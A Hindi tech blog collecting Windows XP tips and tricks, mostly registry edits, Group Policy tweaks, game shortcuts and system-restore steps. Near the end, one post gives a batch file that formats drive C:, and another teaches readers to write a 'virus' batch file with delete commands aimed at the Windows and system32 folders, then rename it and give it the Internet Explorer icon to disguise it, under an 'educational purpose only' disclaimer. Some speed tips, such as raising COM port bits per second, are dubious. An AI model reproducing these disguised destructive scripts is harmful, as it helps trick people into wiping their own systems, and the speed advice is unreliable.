Hindi Tech Blog

विन्डोज़ एक्स पी ट्रिक लेबलों वाले संदेश दिखाए जा रहे हैं. सभी संदेश दिखाएं
विन्डोज़ एक्स पी ट्रिक लेबलों वाले संदेश दिखाए जा रहे हैं. सभी संदेश दिखाएं

30 मई 2013

अपने इन्टरनेट की गति बढ़ाएं DNS cache को हटाकर

flushdns
flushdns

DNS cache को ऑपरेटिंग सिस्टम स्वतः ही स्टोर करता रहता है वो इसलिए की पहले जो साइट्स आपने अपने कंप्यूटर पर खोली है, दुबारा खोलने पर वो जल्दी खुल जाएँ। हांलाकि ये बहुत उपयोगी है पर इसके कुछ नुकसान भी हैं जैसे कि इसकी वजह से किसी वेबसाइट का पुराना वर्जन खुलना, ब्राउजिंग की गति कम होना आदि। इसलिए समय-समय पर इसे हटाना बहुत जरुरी है। इसे आप तब भी प्रयोग कर सकते हैं जब आपके इन्टरनेट कि स्पीड कम होने लगे।

DNS cache को कैसे हटाये?

इसको हटाने का साधारण सा तरीका है -->
अपने कीबोर्ड से विंडो Key+R दबाएँ,
अब रन बॉक्स खुलेगा इसमें टाइप करें CMD और ओके करें,
अब कमांड प्रोम्प्ट खुलेगा, इसमें टाइप करें ipconfig /flushdns  और इंटर Key प्रेस कर दें,
कुछ हि समय में DNS cache हट जायेगा ..

अगर आपको ये ब्लॉग पसंद आ रहा है तो अभी इसके सदस्य बने और ब्लॉग का फेसबुक फेन पेज भी लाइक करें.. धन्यवाद..

05 मई 2013

विंडो एक्स पी (win xp) कि कुछ मजेदार ट्रिक



आज रविवार है तो कुछ मनोरंजन वाली ट्रिक हो जाये।

ट्रिक न. 1
------------

विंडोज XP के गेम Solitaire का सीक्रेट फंडा अभी ट्राई करे।

स्टर्ट मेनू से आल प्रोग्राम में जाएँ।
फिर गेम्स मे से Solitaire ओपन करे।
अब Alt + Shift + 2 बटन प्रेस करें आप बिना खेले ही जीत जाओगे..


ट्रिक न. 2
--------
---

विंडोज XP के गेम FreeCell का सीक्रेट फंडा अभी ट्राई करे।
स्टर्ट मेनू से आल प्रोग्राम में जाएँ
फिर गेम्स मे से FreeCell ओपन करे

अब Ctrl + Shift + F10 बटन प्रेस करें अब यहाँ से Abort पे क्लिक करें।
फिर किसी एक कार्ड को मूव करके देखो, किसी सही जगह पर ....
आप बिना खेले ही जीत जाओगे..

ट्रिक न. 3
--------
----
क्या माइक्रोसॉफ्ट एक्स पी विंडो का केलकुलेटर यहाँ फेल हो गया
अभी ट्राई करे...
जाएँ Start-->Run-->type Calc

और नीचे दी गई वेल्यु चेक कीजिये

2704/50 = 54.08 सही जवाब मिलेगा।
2704/51 = 53.01960784 सही जवाब मिलेगा।
2704/52 = यहाँ फेल है, आपको यहाँ जवाब नहीं मिलगा।
2704/53 = 51.01886792 सही जवाब मिलेगा।
2704/54 = 50.07407407 सही जवाब मिलेगा।

Microsoft Calculator Failed

ट्राई करके देखो अभी........

कुछ समझ आया क्या.???
2704, 52 का स्क्वायर (square) है तो 2704/52 करने पर रिजल्ट 52 ही आयेगा और आपको लगेगा कि कैलकुलेटर काम नहीं कर रहा है…।


ट्रिक न. 4
----------
एक क्लिक में समय और तिथि

नोटपैड या टेक्स्ट फाइल पर काम करते समय F5 'की' दबाकर जहाँ भी आवश्यकता हो,
तात्कालिक समय और तिथि टंकित की जा सकती है।


अगर आपको ये ब्लॉग पसंद आ रहा है तो अभी इसके सदस्य बने और ब्लॉग का फेसबुक फेन पेज भी लाइक करें.. धन्यवाद..

03 अप्रैल 2012

विंडो एक्सपी में बढ़ाएं इंटरनेट स्पीड



अगर आपके पीसी में लेटेस्ट हार्डवेयर है और ब्रॉडबैंड प्लान 512 केबीपीएस से ज्यादा है और फिर भी नेट स्लो चल रहा है तो यह ट्रिक कुछ हद तक स्पीड बढ़ा सकती है, लेकिन लाइटनिंग स्पीड की उम्मीद कतई न करें।


विंडो एक्सपी में इंटरनेट स्पीड बढ़ाने के लिए अपने डेस्कटॉप में जाएं और My computer पर राईट क्लिक करे। फिर properties में जाएं और उसके HARDWARE टैब पर क्लिक करें। अब Device Manager ऑप्शन को खोलें। इसके बाद डिवाइस मैनेजर का विंडो खुलेगा।

अब डिवाइस मैनेजर में Ports मेन्यू में जाएं और उसमें Communication Port पर डबल क्लिक करें। डबल क्लिक करने पर कम्यूनिकेशन पोर्ट प्रॉपर्टीज का विंडो खुलेगा, उसमें Port setting टैब पर क्लिक करें। अब उसके "Bits per second" को 128000 तक बढ़ा दीजिए फिर उसके बाद "Flow control" को Hardware ऑप्शन पर सेट कर दें।

सारी सेटिंग को अप्लाई करने के बाद अपने सेट को रिस्टार्ट कर लें।


विन्डोज़ XP में रिसाइकिल बिन को को वापस लाना



मित्रों आप पिछली पोस्ट से रिसाइकिल बिन को डिलीट करना तो सीख गयें है,  अगर उसे वापस लाना हो तो क्या किया जाये?

आप निम्न चरण अपनाएँ।

Go to START > RUN

Type regedit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Desktop\NameSpace\

अब NameSpace पर राइट क्लिक करें और एक new key बनाएँ।
फिर उस की को रिनेम करें {645FF040-5081-101B-9F08-00AA002F954E}
फिर default value में Recycle Bin लिखें |

और कंप्यूटर रिस्टार्ट करें, रिसाइकिल बिन वापस आ जाएगी।

विन्डोज़ XP में रिसाइकिल बिन को डिलीट करने का दूसरा तरीका



पिछली पोस्ट में अपने पढ़ा की रिसाइकिल बिन को डिलीट कैसे करें 

अब जाने विन्डोज़ XP में रिसाइकिल बिन को डिलीट करने का दूसरा तरीका

Go to START > RUN

Type regedit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Desktop\NameSpace\
{645FF040-5081-101B-9F08-00AA002F954E}

अब इस की (key) को डीलीट करें . i.e {645FF040-5081-101B-9F08-00AA002F954E}

अब रजिस्ट्री एडिटर को बंद करके कंप्यूटर रिस्टार्ट करे।

XP में रिसाइकिल बिन को डिलीट करें




क्या आप रिसाकिल बिन को डिलीट करना चाहते हैं? यदि हाँ तो निम्न चरण अपनाएं
यदि आप XP Pro इस्तेमाल करते हैं तो निम्न चरण आजमायें -------->

Go to START > RUN
Type GPEDIT.MSC

Navagate to USER CONFIGURATION >ADMINISTRATIVE TEMPLATES >Click on DESKTOP,

On the right hand pane find " Remove Recycle Bin icon on the desktop " , double left click on it to ENABLE it.

यदि आप XP Home इस्तेमाल करते हैं तो निम्न चरण आजमायें -------->

Create or modify the following registry entry

Go to START > RUN

Type regedit

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\HideDesktopIcons\NewStartPanel

{645FF040-5081-101B-9F08-00AA002F954E}

REG_DWORD

0x00000001

बदलिए अपने रिसाइकल बिन का नाम



विंडोज विस्टा में तो यह सीधे तरीके से हो जाता हैं लेकिन विंडोज एक्सपी में इसे इसे रीनेम करने का आप्शन ही नही आता।

अगर आप भी अपने Recycle Bin का नाम बदलना चाहते हैं तो पढ़े यह आसन सा तरीका-

रन(RUN) कमांड खोलकर उसमे REGEDIT लिखकर इंटर की प्रेस करें।

आपके इंटर करते ही Registry Editor नाम का विंडो खुलकर आ जायेगा, अब उसमे Edit आप्शन पर जाकर Find आप्शन पर क्लिक करें या कण्ट्रोल के साथ F प्रेस करें और उसमे टाइप करें 645FF040

इसके बाद Find Next पर क्लिक कर दे अब विडो के दाहिने तरफ आपको Default लिखा दिखाई देगा, उस पर डबल क्लिक करें value data में जाकर अपना मनचाहा नाम लिखकर ओके कर दे।

उसके बाद रजिस्ट्री एडिटर को क्लोज करके डेस्कटॉप पर जाकर रिफ्रेश(Refresh) करेंअब आपको Recycle Bin की जगह आपका मनचाहा नाम लिखा दिखाई देगा।

ध्यान दे -सर्च कराते समय -Match whole string only पर चेकमार्क किये बिना ही सर्च कराये।

18 मार्च 2012

इंटरनेट एक्सप्लोरर से ब्राउजिंग हिस्ट्री को हटाने से कैसे रोकें



आमतौर पर लोग इंटरनेट यूज करके इंटरनेट एक्सप्लोरर से ब्राउजिंग हिस्ट्री को हटा देते हैं ताकि उनके बोस या परिजनों को ये न पता चल सके कि उनकी उनुपस्थिती में आपने इंटरनेट पर क्या सर्फ़ किया।
इंटरनेट एक्सप्लोरर से ब्राउजिंग हिस्ट्री को हटाने से इस प्रकार रोका जा सकता है-

1 सबसे पहले स्टार्ट मेनू में जाकर Run कमांड चुने।

2 फिर यहाँ gpedit.msc टाइप करें।
3 फिर यहाँ से Local Computer Policy चुनें, इसके बाद Computer Configuration पर डबल क्लिक करें,
अब पुनः उपस्थित विकल्पों में से Administrative Templates पर डबल क्लिक करें, फिर यहाँ Windows Components पर डबल क्लिक करें,
अब पुनः Internet Explorer पर भी डबल क्लिक करें और अंत में यहाँ उपस्थित विकल्पों में से Delete Browsing History पर डबल क्लिक करें।

4 यहाँ आपको सबसे ऊपर एक विकल्प मिलेगा Turn off "Delete Browsing History" Functionality इस विकल्प पर राईट क्लिक कर
Properties आप्शन चुनें फिर यहाँ अब यहाँ enabled वाले रेडिओ बटन को चेक करके ओके पर क्लिक करें।

कम्प्युटर एरर को कैसे साल्व करे



मित्रों क्या कभी आपने विंडोज के हाइबरनेट ऑप्शन का प्रयोंग किया  हैं?  यह एक बहुत ही उपयोगी फीचर है बिना सिस्टम बन्द किए दुबारा से काम करने के लिए इस ऑप्शन का प्रयोग करते हैं। लेकिन कभी-कभी या कुछ दिनों के बाद एक एरर मैसेज का सामना करना पड जाता है।

यह एरर इस प्रकार से है।

Windows – System Error
Insufficient System resources exist to complete the API


काफी रिसर्च के बाद पाया गया कि यह एरर मैसेज सिस्टम या हार्डवेयर से सम्बन्धित नही है बल्कि यह एक केरनर पावर कमी है और इसका माइक्रोसाफट द्वारा एक समाधान दिया गया है। इसे यहॉं से डाउनलोड कर सकते हें।

आशा करता हूँ इससे इस एरर मैसेज का समाधान हो जाए।

28 फ़रवरी 2012

कंप्यूटर को पीछे की स्थिति में ले जाना - सिस्टम री-स्टोर


मित्रों जब हमें पता लगे कि अभी कुछ दिन पहले कोई वाइरस कंप्यूटर में घुसा है, और वह हमें ज्यादा परेशान कर रहा है कई नए वाइरस एंटी वाइरस की पकड़ में भी नहीं आते और ना हट पाते है।  ऐसी दशा में लोग अक्सर अपने कंप्यूटर को फोर्मेट कर बैठते है ,जबकि इस समस्या का समाधान इस तरह कंप्यूटर को पीछे की तारीख में ले जाकर किया जा सकता है।  दरअसल कंप्यूटर को पीछे की तारीख की स्थिति में पहुंचाते ही कंप्यूटर में बीच के दिनों में हुए सारे बदलाव ख़त्म होकर कंप्यूटर उसी पुरानी स्थिति में जा पहुँचता है।  इस प्रकार यदि कोई वाइरस भी घुसा है तो वह भी अपने आप निकल जाता और उसके द्वारा ख़राब की गयी सभी फाईल्स भी ठीक हो जाती है।

कंप्यूटर को पीछे की स्थिति में कैसे ले जाए?

कंप्यूटर को पीछे की स्थिति में ले जाने को कम्प्यूटरी भाषा में सिस्टम री-स्टोर करना करना कहते है इसके लिए नीचे चित्र में दिखाए अनुसार

start-- All Program -- Accessories -- System tools -- System restore में जाए।




एक विण्डो खुलेगी इसमें Next पर क्लिक करें।



अब एक कलेंडर वाली विण्डो खुलेगी इसमें आपको कौनसी पिछली तारीख की स्थिति में कंप्यूटर को पहुंचाना है उस तारीख को सलेक्ट कर Next पर क्लिक करें।

अब कंप्यूटर ने पिछली तारीख के हिसाब से री-स्टोर करना शुरू कर दिया है थोडी देर में यह प्रक्रिया पूरी होने के बाद कंप्यूटर को री-स्टार्ट कीजिए। अब आप पहुँच गए आपके कंप्यूटर की पिछली तारीख की स्थिति में।

कंप्यूटर को पिछली स्थिति में ले जाने का दूसरा सबसे बढ़िया तरीका है विण्डो को सेफ मोड में चलाकर सिस्टम री-स्टोर करना। इसके लिए कंप्यूटर स्टार्ट करते ही F8 बटन दबाना चालू करदे  जिससे विण्डो को सेफ मोड में चलाने का आप्शन मिल जायेगा जैसे ही आप सेफ मोड सलेक्ट करंगे एक विण्डो खुलेगी उसमे No पर क्लिक करें अब System restore का आप्शन आ जायेगा।

25 फ़रवरी 2012

बूटेबल सीडी के बिना रिपेयर करें Windows XP



मित्रों हमारे सिस्टम की कई फ़ाइल या रजिस्ट्री वायरस के कारण या अन्य कारणों से खराब हो गयी हो तो एक ही विकल्प है की विंडो को रिपेयर किया जाए लेकिन इसके लिए विंडो की बूटेबल सीडी की जरुरत पड़ती है लेकिन मैं ऐसा तरीका बताने वाला हूँ
जिससे आपकी विंडो बिना किसी सीडी के रिपेयर हो जायेगी।


इस विधि को वेब फ़ोल्डर XP मरम्मत सिस्टम कहा जाता है।

इस विधि लागू करने के लिए बस नीचे दिए गए सरल चरणों का पालन करें:

चरण 1 - सबसे पहले Start पर क्लिक करें और run पे क्लिक करें।

चरण 2 - run में लिखों  webfldrs.msi , और ओके कर दो।



चरण 3 - अब नयी विंडो खुलेगी यहाँ select reinstall mode पे क्लिक करो, फिर नई विंडो आपकी स्क्रीन में खुल जाएगी सभी विकल्पों पर जांच के निशान और ओके पर क्लिक करें।

चरण 4 - फिर आप उसी विंडो पर आ जायेंगे अब यहाँ Reinstall को ओके करें।



चरण 5 - अब आपकी विंडो रिपेयर होना शुरू हो जायेगी , इस प्रक्रिया में कुछ समय लगेगा, सब प्रक्रिया समाप्त होने के बाद आपसे Restart  के बारे में पूछेगा।

बस सिस्टम रिस्टार्ट करे और आपकी विंडो रिपेयर की प्रक्रिया समाप्त हो जायेगी।

01 फ़रवरी 2012

कंप्यूटर को फास्ट बनाने का एक मस्त तरीका




मित्रों अक्सर कंप्यूटर पर काम करते करते कुछ टेम्प्रेली फाइल आपके कंप्यूटर में जमा होती रहती है जिससे आपका कंप्यूटर स्लो चलने लगता है,  वेसे तो आप टेम्प फोल्डर खोल कर वो फाइल डिलीट कर सकते हो लेकिन कंप्यूटर पर काम करते करते हम उन फाइल को डिलीट करना भूल जाते है। लेकिन आज मैं आपको ऐसा तरीका बताता हु जिसे करने के बाद आपको टेम्प फाइल डिलीट करने की जरुरत नहीं पड़ेगी,

वो अपने आप ही डिलीट हो जाया करेगी।

इसके लिए आपको स्टार्ट मेन्यू में RUN में जाकर GPEDIT.MSC टाइप करना होगा उसके बाद
Computer Configuration =>
Administrative Templates =>
Windows Components =>
Terminal Services =>
Temporary Folders.

यहाँ आपको "Do not delete temp files on exit" लिखा दिखाई देगा इस पर डबल क्लीक करे और DISABLED पर क्लीक करके Apply कर दे।

ऐसा करने के बाद आपको कभी भी अपने कंप्यूटर की टेम्प्रेली फाइल हटाने की जरूरत नहीं पड़ेगी वो अपने आप ही हट जाया करेगी और आपका कंप्यूटर स्लो नहीं होगा।

.....धन्यवाद

माई कंप्यूटर के राइट क्लीक मेन्यू में जोड़ें Add/Remove Programs का विकल्प



अगर आप  माई कंप्यूटर के राइट क्लीक मेन्यू में  Add/Remove Programs का विकल्प चाहते हैं तो आपको निम्न कोड कॉपी करके नोटपेड पर पेस्ट करना है , और इसे सेव करें Add-Remove Programs.reg

ध्यान रखें सेव करते समय .reg जरुर लिखें , अब इस सेव की हुई रजिस्ट्री फ़ाइल पे डबल क्लिक करें , अब yes और no का विकल्प मिलेगा आप इसे yes करें, आप माई कंप्यूटर के राइट क्लीक मेनू में Add/Remove Programs पाएंगे। ये ट्रिक विंडो xp के लिए है।


कोड ->


Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Add/Remove Programs\command]
@="control appwiz.cpl"



विंडोज XP के गेम FreeCell का सीक्रेट फंडा अभी ट्राय करे



स्टार्ट मेनू से आल प्रोग्राम में जाएँ।
फिर गेम्स मे से FreeCell ओपन करे।
अब Ctrl + Shift + F10 बटन प्रेस करें अब यहाँ से Abort पे क्लिक करें।
फिर किसी एक कार्ड को मूव करके देखो सही जगह पर।

आप बिना खेले ही जीत जाओगे।

है ना कमाल की ट्रिक।

विंडोज XP के गेम Solitaire का सीक्रेट फंडा अभी ट्राय करे



स्टर्ट मेनू से आल प्रोग्राम में जाएँ।
फिर गेम्स मे से Solitaire ओपन करे।

अब Alt + Shift + 2 बटन प्रेस करें आप बिना खेले ही जीत जाओगे।

है ना कमाल की ट्रिक।

31 जनवरी 2012

बड़ा टेक्स्ट एक साथ सेलेक्ट करने के लिये

select all text one click

मित्रों कई बार बड़े टेक्स्ट या पूरी लाइन को सेलेक्ट करने के लिए माउस से पुरे वाक्य को सिलेक्ट करना पड़ता है लेकिन इसका एक आसान तरीका ये है की किसी भी टैक्स्ट एडिटर में बड़ा टेक्स्ट एक साथ सेलेक्ट करने के लिये टैक्स्ट के प्रारंभ में एक क्लिक करें और फिर शिफ्ट दबाकर अंत में एक बार क्लिक करें।

इससे टेक्स्ट को आसानी से सेलेक्ट किया जा सकता है।

आज बस इतना ही मिलते है अगली बार नए विषय के साथ।

30 जनवरी 2012

VLC Media Player देखिये एक फन्नी मोड में

vlc funny mode 


मित्रों VLC Media Player के बारे में सब जानते है ये विंडो के लिए सबसे अच्छा विडिओ प्लेयर है, लगभग इसमें सभी विडिओ और ऑडियो फाइल प्ले होती है।

इसका एक फन्नी मोड़ भी है, फन्नी मोड में देखने के लिए निम्न तरीका अपनाइए -:

१. VLC Media Player ओपन कीजिये इसमें कोई भी ऑडियो या वीडियो मत चलाईये।
२. अब Ctrl + N की दबाएँ, Network Tab की खाली पट्टी दिखेगी।
३. अब वहाँ लिखिए screen://
४. फिर इंटर बटन दबाए।
५. देखिये VLC Media Player क्या दिखता है।




फोर्मेट करने का बढ़िया तरीका




जेसे हमें c:// पार्टीशियन को फोर्मेट करना हो तो निम्न कदम अपनाएँ

1. नोटपेड खोले
2. फिर लिखें
@echo off
start
start
start
start
start
start
start
format C:
shutdown -p
echo

3. और फिर सेव आल  फ़ाइल करें format.bat नाम से।
५. अब इस फ़ाइल पे क्लिक करे फोर्मेट शुरू हो जाएगा।
इस तरह जिस किसी पार्टीशियन को फोर्मेट करना हो ये तरीका अपना सकते हैं।
ये तरीका विंडो xp के लिए है।

नोटपेड के माध्यम से बनाईये वायरस



१. नोटपेड खोलिए और लिखें "del system32"
२. फिर एंटर बटन दबाए और लिखें "del windows"
३. इस फाइल को सेव करें save as tpye all files में virus.bat के नाम से।
४. इसे रिनेम कर लिखें Internet Explorer
५. फिर फाइल को राइट क्लिक करें और प्रोपर्टी में जाएँ।
६. फिर Change icon पे क्लिक करे और Internet Explorer का आइकॉन सेट करें।
७. आपका वायरस तेयार है।


जब भी इस फ़ाइल पे डबल क्लीक करेंगे तो ये del system32 को डीलीट कर देगा।


Note: This post is for EDUCATIONAL purpose only, what you do with it is your own responsibilities.

बदलिए अपने रिसाइकिल बिन का नाम



विंडोज विस्टा में तो यह सीधे तरीके से हो जाता हैं लेकिन विंडोज एक्सपी में इसे इसे रीनेम करने का आप्शन ही नही आता| अगर आप भी अपने Recycle Bin का नाम बदलना चाहते हैं तो पढ़े यह आसन सा तरीका-

रन(RUN) कमांड खोलकर उसमे REGEDIT लिखकर इंटर की प्रेश करें |
आपके इंटर करते ही Registry Editor नाम का विंडो खुलकर आ जायेगा |

अब उसमे Edit आप्शन पर जाकर Find आप्शन पर क्लिक करें या कण्ट्रोल के साथ F प्रेस करें और उसमे टाइप करें 645FF040
इसके बाद Find Next पर क्लिक कर दे अब विडो के दाहिने तरफ आपको Default लिखा दिखाई देगा,
उस पर डबल क्लिक करें value data में जाकर अपना मनचाहा नाम लिखकर ओके कर दे,
उसके बाद रजिस्ट्री एडिटर को क्लोज करके डेस्कटॉप पर जाकर रिफ्रेश(Refresh) करें,
अब आपको Recycle Bin की जगह आपका मनचाहा नाम लिखा दिखाई देगा|

ध्यान दे -सर्च कराते समय -Match whole string only पर चेकमार्क किये बिना ही सर्च कराये |
loading...